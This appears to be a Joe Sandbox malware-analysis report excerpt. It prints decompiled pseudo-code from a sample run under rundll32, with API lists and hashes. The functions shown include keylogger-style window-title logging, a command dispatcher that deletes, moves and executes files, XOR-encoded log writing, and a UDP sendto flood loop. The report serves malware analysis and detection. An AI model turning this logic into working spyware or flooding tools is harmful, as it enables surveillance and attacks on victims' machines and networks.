                                                            0x0463b3a6
                                                            0x0463b3ab
                                                            0x0463b3b6
                                                            0x0463b3bc
                                                            0x0463b3bf
                                                            0x0463b3c2
                                                            0x0463b3c2
                                                            0x0463b3c5
                                                            0x0463b3c8
                                                            0x0463b3d1
                                                            0x0463b3e5
                                                            0x0463b3f4
                                                            0x0463b43d
                                                            0x0463b443
                                                            0x0463b44c
                                                            0x0463b451
                                                            0x0463b451
                                                            0x0463b457
                                                            0x0463b45e
                                                            0x0463b462
                                                            0x0463b467
                                                            0x0463b467
                                                            0x0463b476
                                                            0x0463b47d
                                                            0x0463b486
                                                            0x0463b48e
                                                            0x0463b48e
                                                            0x0463b495
                                                            0x0463b49c
                                                            0x0463b4a2
                                                            0x0463b4a7
                                                            0x00000000
                                                            0x0463b4a7
                                                            0x0463b34d
                                                            0x0463b353
                                                            0x0463b353
                                                            0x0463b356
                                                            0x0463b356
                                                            0x0463b35c
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b361
                                                            0x0463b378
                                                            0x0463b378
                                                            0x0463b381
                                                            0x0463b383
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b383
                                                            0x0463b363
                                                            0x0463b36b
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b36d
                                                            0x0463b370
                                                            0x0463b376
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b376
                                                            0x0463b37c
                                                            0x0463b37e
                                                            0x00000000

                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 0463B31D
                                                            • GetWindowTextW.USER32(00000000,?,00000101), ref: 0463B336
                                                            • GetLocalTime.KERNEL32(?), ref: 0463B3F4
                                                            • wsprintfW.USER32 ref: 0463B43D
                                                            • lstrcatW.KERNEL32(00000416), ref: 0463B49C
                                                            Strings
                                                            • [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:], xrefs: 0463B437
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$ForegroundLocalTextTimelstrcatwsprintf
                                                            • String ID: [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:]
                                                            • API String ID: 67575802-2837871436
                                                            • Opcode ID: 96388d20ec1beff1d04b947a2bfaea70c68dd061446d779bcbb56210f50846e7
                                                            • Instruction ID: 6e95e2797067fab24f0f9965359b14dc47625eed70973f97feae61e1c6fadb37
                                                            • Opcode Fuzzy Hash: 96388d20ec1beff1d04b947a2bfaea70c68dd061446d779bcbb56210f50846e7
                                                            • Instruction Fuzzy Hash: F951E475A002199BDB24DF64CC84BF6B3B8FF18705F4445A9E909E3241F775BA84CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E04634130(void* __ebx, void* __ecx, signed char* _a4, intOrPtr _a8) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				signed int _t26;
                                                            
                                                            				_t26 = ( *_a4 & 0x000000ff) + 0xfffffffb;
                                                            				if(_t26 > 0xe) {
                                                            					L19:
                                                            					return _t26;
                                                            				} else {
                                                            					switch( *((intOrPtr*)(_t26 * 4 +  &M04634268))) {
                                                            						case 0:
                                                            							return E04634C20(__ebx, __ecx, __ecx, _t36, _t31 + 1);
                                                            							goto L20;
                                                            						case 1:
                                                            							__eax = __edx + 1;
                                                            							__eax = E046352C0(__ebx, __ecx, __edi, __edx + 1);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 2:
                                                            							__eax = __edx + 1;
                                                            							__eax = E046356D0(__ebx, __ecx, __edi, __esi, __edx + 1);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 3:
                                                            							_a8 = _a8 - 1;
                                                            							__eflags = _a8 - 1;
                                                            							__eax = __edx + 1;
                                                            							__eax = E04635910(__ebx, __ecx, __edi, __esi, __edx + 1, __edx + 1);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 4:
                                                            							goto L19;
                                                            						case 5:
                                                            							__eax = __edx + 1;
                                                            							__eax = E046350B0(__ecx, __edx + 1);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 6:
                                                            							__eax = E046356A0(__ecx);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 7:
                                                            							__edx + 1 = DeleteFileW(__edx + 1);
                                                            							goto L4;
                                                            						case 8:
                                                            							__edx + 1 = E04634E30(__ebx, __ecx, __edi, __esi, __edx + 1);
                                                            							L4:
                                                            							_v8 = 0x6d;
                                                            							goto L5;
                                                            						case 9:
                                                            							__eax =  *(__edx + 1);
                                                            							 *(__edi + 0x14) =  *(__edx + 1);
                                                            							__eax = E046357F0(__ebx, __ecx, __edi, __esi);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 0xa:
                                                            							__edx + 1 = E04634670(__ecx, __eflags, __edx + 1);
                                                            							_v12 = 0x70;
                                                            							goto L5;
                                                            						case 0xb:
                                                            							__esi = __edx + 1;
                                                            							__eax = lstrlenW(__esi);
                                                            							__eax =  &(__eax[0]);
                                                            							__eax = MoveFileW(__esi, __eax);
                                                            							_v8 = 0x72;
                                                            							L5:
                                                            							_push(__ecx);
                                                            							__ecx =  *((intOrPtr*)(__edi + 4));
                                                            							__eax =  &_v8;
                                                            							_push(0x3f);
                                                            							_push(1);
                                                            							_push( &_v8);
                                                            							__eax = E04631C60( *((intOrPtr*)(__edi + 4)));
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 0xc:
                                                            							_push(5);
                                                            							goto L16;
                                                            						case 0xd:
                                                            							_push(0);
                                                            							L16:
                                                            							__eax = __edx + 1;
                                                            							__eax = ShellExecuteW(0, L"open", __edx + 1, 0, 0, ??);
                                                            							_pop(__edi);
                                                            							_pop(__esi);
                                                            							return __eax;
                                                            							goto L20;
                                                            						case 0xe:
                                                            							__edx + 1 = E046345E0(__ecx, __edx + 1);
                                                            							goto L19;
                                                            					}
                                                            				}
                                                            				L20:
                                                            			}
                                                            0x04634140
                                                            0x04634149
                                                            0x0463425d
                                                            0x04634262
                                                            0x0463414f
                                                            0x0463414f
                                                            0x00000000
                                                            0x04634164
                                                            0x00000000
                                                            0x00000000
                                                            0x0463419b
                                                            0x0463419f
                                                            0x046341a4
                                                            0x046341a5
                                                            0x046341a9
                                                            0x00000000
                                                            0x00000000
                                                            0x0463420a
                                                            0x0463420e
                                                            0x04634213
                                                            0x04634214
                                                            0x04634218
                                                            0x00000000
                                                            0x00000000
                                                            0x0463421e
                                                            0x0463421e
                                                            0x04634220
                                                            0x04634224
                                                            0x04634229
                                                            0x0463422a
                                                            0x0463422e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046341ac
                                                            0x046341b0
                                                            0x046341b5
                                                            0x046341b6
                                                            0x046341ba
                                                            0x00000000
                                                            0x00000000
                                                            0x046341ea
                                                            0x046341ef
                                                            0x046341f0
                                                            0x046341f4
                                                            0x00000000
                                                            0x00000000
                                                            0x0463416b
                                                            0x00000000
                                                            0x00000000
                                                            0x04634194
                                                            0x04634171
                                                            0x04634171
                                                            0x00000000
                                                            0x00000000
                                                            0x046341f7
                                                            0x046341fa
                                                            0x046341fd
                                                            0x04634202
                                                            0x04634203
                                                            0x04634207
                                                            0x00000000
                                                            0x00000000
                                                            0x046341c1
                                                            0x046341c6
                                                            0x00000000
                                                            0x00000000
                                                            0x046341cd
                                                            0x046341d1
                                                            0x046341d7
                                                            0x046341dd
                                                            0x046341e3
                                                            0x04634176
                                                            0x04634176
                                                            0x04634177
                                                            0x0463417a
                                                            0x0463417e
                                                            0x04634180
                                                            0x04634182
                                                            0x04634183
                                                            0x04634188
                                                            0x04634189
                                                            0x0463418d
                                                            0x00000000
                                                            0x00000000
                                                            0x04634231
                                                            0x00000000
                                                            0x00000000
                                                            0x04634250
                                                            0x04634233
                                                            0x04634237
                                                            0x04634242
                                                            0x04634248
                                                            0x04634249
                                                            0x0463424d
                                                            0x00000000
                                                            0x00000000
                                                            0x04634258
                                                            0x00000000
                                                            0x00000000
                                                            0x0463414f
                                                            0x00000000

                                                            APIs
                                                            • DeleteFileW.KERNEL32(?), ref: 0463416B
                                                            • lstrlenW.KERNEL32(?,?,?,?,?), ref: 046341D1
                                                            • MoveFileW.KERNEL32(?,00000001), ref: 046341DD
                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 04634242
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$DeleteExecuteMoveShelllstrlen
                                                            • String ID: open$r
                                                            • API String ID: 69973834-2967530574
                                                            • Opcode ID: 374693319a2492ac3beada1b4ac6bac3cdb85167828878f8fd3f69e736d34f14
                                                            • Instruction ID: 5082011bda1d5a1434730115396c0bdc9e90fabddba84bfae3b7e13121f88e40
                                                            • Opcode Fuzzy Hash: 374693319a2492ac3beada1b4ac6bac3cdb85167828878f8fd3f69e736d34f14
                                                            • Instruction Fuzzy Hash: BC31B63761815996D300EF98F844FAAF39CEBD9222F00836BE904C7141FA66F56487E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E0463B1A0(intOrPtr* __ecx) {
                                                            				void* _v8;
                                                            				long _v12;
                                                            				intOrPtr _v16;
                                                            				long _v20;
                                                            				void* _v24;
                                                            				void* __esi;
                                                            				intOrPtr _t21;
                                                            				intOrPtr _t25;
                                                            				signed char _t31;
                                                            				signed int _t36;
                                                            				void* _t37;
                                                            				void* _t41;
                                                            				long _t42;
                                                            				intOrPtr* _t46;
                                                            				void* _t49;
                                                            				void* _t51;
                                                            				void* _t53;
                                                            				void* _t54;
                                                            				void* _t55;
                                                            				intOrPtr* _t56;
                                                            				void* _t57;
                                                            				void* _t58;
                                                            				void* _t59;
                                                            				void* _t60;
                                                            				void* _t62;
                                                            
                                                            				_t21 =  *0x4687adc; // 0x0
                                                            				_t56 = __ecx;
                                                            				_t41 = CreateFileW(_t21 + 0x20e, 0x40000000, 2, 0, 4, 0x80, 0);
                                                            				_v20 = 0;
                                                            				_v24 = _t41;
                                                            				if(GetFileSize(_t41, 0) < 0x3200000) {
                                                            					SetFilePointer(_t41, 0, 0, 2);
                                                            				}
                                                            				_t46 = _t56;
                                                            				_t54 = _t46 + 2;
                                                            				do {
                                                            					_t25 =  *_t46;
                                                            					_t46 = _t46 + 2;
                                                            					_t68 = _t25;
                                                            				} while (_t25 != 0);
                                                            				_t48 = _t46 - _t54 >> 1;
                                                            				_t42 = (_t46 - _t54 >> 1) + (_t46 - _t54 >> 1);
                                                            				_push(_t42);
                                                            				_v12 = _t42;
                                                            				_t60 = L04655B55(_t48, _t59, _t68);
                                                            				_t55 = 0;
                                                            				_v8 = _t60;
                                                            				if(_t42 > 0) {
                                                            					if(_t42 >= 0x20) {
                                                            						_t8 = _t60 - 1; // -1
                                                            						_t51 = _t8 + _t42;
                                                            						if(_t60 > _t56 - 1 + _t42 || _t51 < _t56) {
                                                            							_t36 = _t42 & 0x8000001f;
                                                            							if(_t36 < 0) {
                                                            								_t36 = (_t36 - 0x00000001 | 0xffffffe0) + 1;
                                                            							}
                                                            							asm("movaps xmm1, [0x467f990]");
                                                            							_t53 = _t42 - _t36;
                                                            							_t37 = _t60;
                                                            							_v16 = _t56 - _t60;
                                                            							_t42 = _v12;
                                                            							do {
                                                            								asm("movups xmm0, [esi+eax]");
                                                            								_t37 = _t37 + 0x20;
                                                            								asm("pxor xmm0, xmm1");
                                                            								asm("movups [eax-0x20], xmm0");
                                                            								asm("movups xmm0, [edi+edx+0x10]");
                                                            								_t55 = _t55 + 0x20;
                                                            								asm("pxor xmm0, xmm1");
                                                            								asm("movups [eax-0x10], xmm0");
                                                            							} while (_t55 < _t53);
                                                            							_t60 = _v8;
                                                            						}
                                                            					}
                                                            					if(_t55 < _t42) {
                                                            						_t49 = _t55 + _t60;
                                                            						_t58 = _t56 - _t60;
                                                            						_t62 = _t42 - _t55;
                                                            						do {
                                                            							_t31 =  *((intOrPtr*)(_t49 + _t58));
                                                            							_t49 = _t49 + 1;
                                                            							 *(_t49 - 1) = _t31 ^ 0x00000058;
                                                            							_t62 = _t62 - 1;
                                                            						} while (_t62 != 0);
                                                            						_t60 = _v8;
                                                            					}
                                                            				}
                                                            				_t57 = _v24;
                                                            				WriteFile(_t57, _t60, _t42,  &_v20, 0);
                                                            				CloseHandle(_t57);
                                                            				return L04655B0F(_t60);
                                                            			}
                                                            0x0463b1a6
                                                            0x0463b1c5
                                                            0x0463b1ce
                                                            0x0463b1d0
                                                            0x0463b1da
                                                            0x0463b1e8
                                                            0x0463b1f1
                                                            0x0463b1f1
                                                            0x0463b1f7
                                                            0x0463b1f9
                                                            0x0463b200
                                                            0x0463b200
                                                            0x0463b203
                                                            0x0463b206
                                                            0x0463b206
                                                            0x0463b20d
                                                            0x0463b20f
                                                            0x0463b212
                                                            0x0463b213
                                                            0x0463b21e
                                                            0x0463b220
                                                            0x0463b222
                                                            0x0463b227
                                                            0x0463b230
                                                            0x0463b235
                                                            0x0463b23a
                                                            0x0463b23e
                                                            0x0463b246
                                                            0x0463b24b
                                                            0x0463b251
                                                            0x0463b251
                                                            0x0463b252
                                                            0x0463b25b
                                                            0x0463b261
                                                            0x0463b263
                                                            0x0463b266
                                                            0x0463b270
                                                            0x0463b270
                                                            0x0463b274
                                                            0x0463b277
                                                            0x0463b27b
                                                            0x0463b27f
                                                            0x0463b284
                                                            0x0463b287
                                                            0x0463b28b
                                                            0x0463b28f
                                                            0x0463b293
                                                            0x0463b293
                                                            0x0463b23e
                                                            0x0463b298
                                                            0x0463b29a
                                                            0x0463b29d
                                                            0x0463b2a1
                                                            0x0463b2a3
                                                            0x0463b2a3
                                                            0x0463b2a6
                                                            0x0463b2ab
                                                            0x0463b2ae
                                                            0x0463b2ae
                                                            0x0463b2b3
                                                            0x0463b2b3
                                                            0x0463b298
                                                            0x0463b2b6
                                                            0x0463b2c2
                                                            0x0463b2c9
                                                            0x0463b2de

                                                            APIs
                                                            • CreateFileW.KERNEL32(-0000020E,40000000,00000002,00000000,00000004,00000080,00000000), ref: 0463B1C8
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0463B1DD
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0463B1F1
                                                            • WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0463B2C2
                                                            • CloseHandle.KERNEL32(?), ref: 0463B2C9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandlePointerSizeWrite
                                                            • String ID:
                                                            • API String ID: 1886887421-3916222277
                                                            • Opcode ID: 84555dac32ecbd5c0f3210d882d2cb29583d4ea6676e45a3d22b2cc37474e1e2
                                                            • Instruction ID: 023d12e557edd9c972a5367755ef72c152f5befbd8e6c1f554729823be9d408c
                                                            • Opcode Fuzzy Hash: 84555dac32ecbd5c0f3210d882d2cb29583d4ea6676e45a3d22b2cc37474e1e2
                                                            • Instruction Fuzzy Hash: 6D412571A00249ABDB14CF78CC89BBDB7A4EF88719F15436CE909A7282FB707945C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E046525A0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
                                                            				void* __esi;
                                                            				void* _t38;
                                                            				void* _t44;
                                                            				void* _t53;
                                                            				void* _t55;
                                                            				LONG* _t68;
                                                            				void* _t69;
                                                            				intOrPtr* _t77;
                                                            				void* _t80;
                                                            				LONG* _t81;
                                                            
                                                            				_t62 = __ebx;
                                                            				_t77 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x54)) == 3) {
                                                            					L12:
                                                            					 *((intOrPtr*)(_t77 + 0x58)) = 1;
                                                            					SetLastError(0x139f);
                                                            					__eflags = 0;
                                                            					return 0;
                                                            				} else {
                                                            					E0464EC90(__ecx + 0x174);
                                                            					_t38 =  *((intOrPtr*)( *__ecx + 0x2c))();
                                                            					_t85 = _t38;
                                                            					if(_t38 == 0) {
                                                            						 *(__ecx + 0x174) = 0;
                                                            						goto L12;
                                                            					} else {
                                                            						 *((intOrPtr*)(__ecx + 0x54)) = 2;
                                                            						 *(__ecx + 0x174) = 0;
                                                            						E04652750(__ecx, _t85);
                                                            						L04653350(__ebx, _t77, _t77, _t80);
                                                            						_t68 = _t77;
                                                            						L046533C0(__ebx, _t68, _t77, _t80);
                                                            						if( *((intOrPtr*)(_t77 + 0x23c)) != 0) {
                                                            							_push(0x80004005);
                                                            							E04637AC0();
                                                            							goto L14;
                                                            						} else {
                                                            							_t69 = _t77 + 0x178;
                                                            							if( *((intOrPtr*)(_t77 + 0x17c)) != 0) {
                                                            								E04640410(_t69, _t80);
                                                            							}
                                                            							 *((intOrPtr*)( *_t77 + 0xf4))();
                                                            							E04654CF0(_t77 + 0x2b4, _t77);
                                                            							_t68 = _t77 + 0x378;
                                                            							E04655860(_t68,  *((intOrPtr*)(_t77 + 0x1c)), 1);
                                                            							if( *((intOrPtr*)(_t77 + 0x37c)) != 0) {
                                                            								L14:
                                                            								_push(0x80004005);
                                                            								E04637AC0();
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								_push(_t80);
                                                            								_t81 = _t68;
                                                            								_t44 =  *(_t81 + 0x84);
                                                            								__eflags = _t44;
                                                            								if(_t44 != 0) {
                                                            									HeapDestroy(_t44);
                                                            								}
                                                            								 *(_t81 + 0x84) = HeapCreate( *(_t81 + 0x88),  *(_t81 + 0x8c),  *(_t81 + 0x90));
                                                            								asm("xorps xmm0, xmm0");
                                                            								asm("movups [esi+0x5c], xmm0");
                                                            								asm("movq [esi+0x6c], xmm0");
                                                            								 *(_t81 + 0x74) = 0;
                                                            								 *(_t81 + 0x40) = 0;
                                                            								 *(_t81 + 0x44) = 0;
                                                            								 *((intOrPtr*)(_t81 + 0x54)) = 3;
                                                            								return SetEvent( *(_t81 + 0x3c));
                                                            							} else {
                                                            								E046404A0(_t62, _t77 + 0xb0);
                                                            								_t53 =  *(_t77 + 0x94);
                                                            								if(_t53 != 0) {
                                                            									HeapDestroy(_t53);
                                                            								}
                                                            								 *(_t77 + 0x94) = HeapCreate( *(_t77 + 0x98),  *(_t77 + 0x9c),  *(_t77 + 0xa0));
                                                            								_t55 =  *(_t77 + 0x50);
                                                            								if(_t55 != 0) {
                                                            									CloseHandle(_t55);
                                                            									 *(_t77 + 0x50) = 0;
                                                            								}
                                                            								 *((intOrPtr*)( *_t77 + 0x120))();
                                                            								return 1;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            Instruction addresses: 0x046525a0, 0x046525a2, 0x046525a8, 0x046526af, 0x046526b4, 0x046526bb, 0x046526c2, 0x046526c5, 0x046525ae, 0x046525b4, 0x046525bd, 0x046525c0, 0x046525c2, 0x046526a5, 0x00000000, 0x046525c8, 0x046525c8, 0x046525d1, 0x046525db, 0x046525e2, 0x046525e7, 0x046525e9, 0x046525f5, 0x046526c6, 0x046526cb, 0x00000000, 0x046525fb, 0x04652602, 0x04652608, 0x0465260a, 0x0465260a, 0x04652613, 0x0465261f, 0x04652627, 0x0465262f, 0x0465263e, 0x046526d0, 0x046526d0, 0x046526d5, 0x046526da, 0x046526db, 0x046526dc, 0x046526dd, 0x046526de, 0x046526df, 0x046526e0, 0x046526e1, 0x046526e3, 0x046526e9, 0x046526eb, 0x046526ee, 0x046526ee, 0x0465270c, 0x04652712, 0x04652715, 0x04652719, 0x0465271e, 0x04652728, 0x0465272f, 0x04652736, 0x04652744, 0x04652644, 0x0465264a, 0x0465264f, 0x04652657, 0x0465265a, 0x0465265a, 0x04652678, 0x0465267e, 0x04652683, 0x04652686, 0x0465268c, 0x0465268c, 0x04652697, 0x046526a4, 0x046526a4, 0x0465263e, 0x046525f5, 0x046525c2

                                                            APIs
                                                            • SetLastError.KERNEL32(0000139F,?,00000000,0463F8B6), ref: 046526BB
                                                              • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
                                                              • Part of subcall function 0464EC90: SwitchToThread.KERNEL32(?,?,00000000,0464E712,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8), ref: 0464ECBD
                                                            • HeapDestroy.KERNEL32(?), ref: 0465265A
                                                            • HeapCreate.KERNEL32(?,?,?), ref: 04652672
                                                            • CloseHandle.KERNEL32(?), ref: 04652686
                                                            • HeapDestroy.KERNEL32(?,00000000,80004005,80004005), ref: 046526EE
                                                            • HeapCreate.KERNEL32(?,?,?,00000000,80004005,80004005), ref: 04652706
                                                            • SetEvent.KERNEL32(80004005), ref: 0465273D
                                                              • Part of subcall function 046533C0: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 046533F9
                                                              • Part of subcall function 046533C0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF), ref: 0465344C
                                                              • Part of subcall function 046533C0: CloseHandle.KERNEL32(?,?,00000001,000000FF), ref: 04653463
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$CloseCreateDestroyHandle$CompareCompletionErrorEventExchangeInterlockedLastMultipleObjectsPostQueuedStatusSwitchThreadWait
                                                            • String ID:
                                                            • API String ID: 1858100233-0
                                                            • Opcode ID: 093a9432a2ba74193ebc5d64be34559342f31b90ec083be9cb7b7e02b4912606
                                                            • Instruction ID: 91602d9bff163ebaf71d4623462677848822b4e605dce2de31798a2b37d6ae61
                                                            • Opcode Fuzzy Hash: 093a9432a2ba74193ebc5d64be34559342f31b90ec083be9cb7b7e02b4912606
                                                            • Instruction Fuzzy Hash: CD415971300A42EFEB18AF30D858BAAF7A5FF54308F04411DE92A82251EF74B464CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E04633EF0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				intOrPtr _v20;
                                                            				signed int _v22;
                                                            				char _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				signed int _v36;
                                                            				signed int _t47;
                                                            				signed int _t51;
                                                            				long _t56;
                                                            				intOrPtr _t57;
                                                            				intOrPtr _t66;
                                                            				struct _CRITICAL_SECTION* _t78;
                                                            				intOrPtr _t81;
                                                            				signed int _t82;
                                                            
                                                            				_t47 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t47 ^ _t82;
                                                            				_t81 = _a4;
                                                            				_v24 = 2;
                                                            				_t67 =  *((intOrPtr*)(_t81 + 4));
                                                            				_v20 =  *((intOrPtr*)(_t67 + 0xc));
                                                            				_t51 =  *(_t67 + 0x10) & 0x0000ffff;
                                                            				__imp__#9(_t51);
                                                            				_v22 = _t51;
                                                            				__imp__#23(2, 2, 0);
                                                            				_t65 = _t51;
                                                            				_v36 = _t51;
                                                            				if( *((char*)(_t81 + 1)) != 0) {
                                                            					do {
                                                            						_v32 = 0;
                                                            						if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 0x24)) > 0) {
                                                            							do {
                                                            								_t66 =  *((intOrPtr*)(_t81 + 4));
                                                            								if( *((short*)(_t66 + 0x16)) != 3) {
                                                            									_t57 =  *((intOrPtr*)(_t66 + 0x1c));
                                                            									_v28 = _t57;
                                                            									if(_t57 !=  *((intOrPtr*)(_t66 + 0x18))) {
                                                            										_t79 =  *((intOrPtr*)(_t66 + 0x18));
                                                            										_t57 =  *((intOrPtr*)(_t66 + 0x18)) + E0465EF46(_t67) % ( *((intOrPtr*)(_t66 + 0x1c)) - _t79 + 1);
                                                            										goto L7;
                                                            									}
                                                            								} else {
                                                            									_t57 =  *((intOrPtr*)(_t66 + 0x34));
                                                            									L7:
                                                            									_v28 = _t57;
                                                            								}
                                                            								_t67 =  &_v24;
                                                            								_t65 = _v36;
                                                            								__imp__#20(_v36,  *((intOrPtr*)(_t66 + 0x3c)), _t57, 0,  &_v24, 0x10);
                                                            								if(_t57 != 0xffffffff) {
                                                            									goto L9;
                                                            								}
                                                            								goto L12;
                                                            								L9:
                                                            								if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 8)) != 0) {
                                                            									_t78 = _t81 + 0x3c;
                                                            									EnterCriticalSection(_t78);
                                                            									asm("cdq");
                                                            									 *((intOrPtr*)(_t81 + 0x18)) =  *((intOrPtr*)(_t81 + 0x18)) + _v28 + 0x2e;
                                                            									asm("adc [esi+0x1c], edx");
                                                            									 *((intOrPtr*)(_t81 + 0x10)) =  *((intOrPtr*)(_t81 + 0x10)) + 1;
                                                            									asm("adc dword [esi+0x14], 0x0");
                                                            									LeaveCriticalSection(_t78);
                                                            								}
                                                            								_t67 = _v32 + 1;
                                                            								_v32 = _t67;
                                                            							} while (_t67 <  *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 0x24)));
                                                            						}
                                                            						L12:
                                                            						_t56 =  *( *((intOrPtr*)(_t81 + 4)) + 0x28);
                                                            						if(_t56 != 0) {
                                                            							Sleep(_t56);
                                                            						}
                                                            					} while ( *((char*)(_t81 + 1)) != 0);
                                                            				}
                                                            				__imp__#3();
                                                            				return E04655AFE(_v8 ^ _t82, _t65);
                                                            			}

                                                            Instruction addresses: 0x04633ef6, 0x04633efd, 0x04633f02, 0x04633f0a, 0x04633f0e, 0x04633f14, 0x04633f17, 0x04633f1c, 0x04633f28, 0x04633f2c, 0x04633f36, 0x04633f38, 0x04633f3b, 0x04633f42, 0x04633f45, 0x04633f50, 0x04633f56, 0x04633f56, 0x04633f5e, 0x04633f65, 0x04633f68, 0x04633f6e, 0x04633f70, 0x04633f82, 0x00000000, 0x04633f82, 0x04633f60, 0x04633f60, 0x04633f85, 0x04633f85, 0x04633f85, 0x04633f8a, 0x04633f94, 0x04633f98, 0x04633fa1, 0x00000000, 0x00000000, 0x00000000, 0x04633fa3, 0x04633faa, 0x04633fac, 0x04633fb0, 0x04633fbc, 0x04633fbd, 0x04633fc1, 0x04633fc4, 0x04633fc8, 0x04633fcc, 0x04633fcc, 0x04633fd8, 0x04633fd9, 0x04633fdc, 0x04633f56, 0x04633fe5, 0x04633fe8, 0x04633fed, 0x04633ff0, 0x04633ff0, 0x04633ff6, 0x04634000, 0x04634002, 0x04634019

                                                            APIs
                                                            • htons.WS2_32(?), ref: 04633F1C
                                                            • socket.WS2_32(00000002,00000002,00000000), ref: 04633F2C
                                                            • sendto.WS2_32(?,?,?,00000000,?,00000010), ref: 04633F98
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04633FB0
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04633FCC
                                                            • Sleep.KERNEL32(?), ref: 04633FF0
                                                            • closesocket.WS2_32(00000000), ref: 04634002
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeaveSleepclosesockethtonssendtosocket
                                                            • String ID:
                                                            • API String ID: 920770778-0
                                                            • Opcode ID: f7377446d5df5585c5810c085de23520b09482487f15a10bb51eb56d2f6b1e1a
                                                            • Instruction ID: d0daca4476914cf8892dfb5d8a365326b60f394ef759b924cad59f0dfcefa033
                                                            • Opcode Fuzzy Hash: f7377446d5df5585c5810c085de23520b09482487f15a10bb51eb56d2f6b1e1a
                                                            • Instruction Fuzzy Hash: BA415870A003059FDB28CF64C989B6AB7F5FF08711F40455DE9569B281EB74ED85CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
